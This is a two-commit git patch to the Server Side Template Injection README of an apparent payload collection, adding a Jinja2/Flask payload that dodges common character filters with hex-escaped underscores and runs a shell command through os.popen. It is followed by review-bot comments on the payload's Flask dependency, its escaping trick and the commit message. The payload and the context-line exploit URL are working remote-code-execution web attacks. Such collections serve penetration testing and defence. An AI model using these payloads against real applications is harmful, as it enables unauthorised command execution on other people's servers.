From cc3b05017dff2055ee3fe187a27437390b1b100a Mon Sep 17 00:00:00 2001 From: chiv Date: Mon, 13 Apr 2020 18:44:16 +0100 Subject: [PATCH 1/2] Added a new RCE payload to Jinja2 SSTI bypasses --- Server Side Template Injection/README.md | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index 79c2a9f7..45447693 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md @@ -368,6 +368,11 @@ Bypassing `|join` http://localhost:5000/?exploit={{request|attr(request.args.f|format(request.args.a,request.args.a,request.args.a,request.args.a))}}&f=%s%sclass%s%s&a=_ ``` +Bypassing most common filters ('.','_','|join','[',']','mro' and 'base'): +```python +{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}} +``` + ## Jinjava ### Basic injection From 7e7f5e762831266b22531c258d628172c7038bb9 Mon Sep 17 00:00:00 2001 From: chiv Date: Mon, 13 Apr 2020 18:48:43 +0100 Subject: [PATCH 2/2] Added SSTI RCE bypass payload for Jinja2 --- Server Side Template Injection/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index 45447693..2c35f22c 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md 
@@ -368,7 +368,7 @@ Bypassing `|join` http://localhost:5000/?exploit={{request|attr(request.args.f|format(request.args.a,request.args.a,request.args.a,request.args.a))}}&f=%s%sclass%s%s&a=_ ``` -Bypassing most common filters ('.','_','|join','[',']','mro' and 'base'): +Bypassing most common filters ('.','_','|join','[',']','mro' and 'base') by https://twitter.com/SecGus: ```python {{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}} ```
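Review bot: the new "Bypassing most common filters" line in the first hunk should say this payload is Flask/Werkzeug specific, not generic Jinja2: the chain starts from `request|attr('application')`, so it only works where `request` is Flask's request proxy (a bound Werkzeug method whose `__globals__` dictionary is what yields `__builtins__`); in a bare Jinja2 environment `request` is undefined and the chain returns nothing. Two more caveats belong on that line: the `\x5f\x5fglobals\x5f\x5f` literals hide the underscore from a filter on the raw template text only because Jinja2 decodes string-literal escapes when it parses the expression, so a filter that blocks `\` or `\x` still stops it and "bypassing '_'" should be qualified accordingly; and the fence is tagged ```python although the content is a Jinja2 expression, while the neighbouring `|join` example in the context lines uses an untagged fence, so drop the tag for consistency.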
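Review bot: the second hunk changes only the intro line to add the attribution link, yet its commit message reads "Added SSTI RCE bypass payload for Jinja2"; the payload itself arrived in the first commit of this series. Suggest squashing the two commits or retitling this one along the lines of "Credit SecGus for the Jinja2 filter-bypass payload" so the history matches the diff. While this line is being edited, the list of bypassed filters still names 'mro' and 'base', which the payload never references; it would be more accurate to say the payload avoids those tokens rather than that filters on them are defeated.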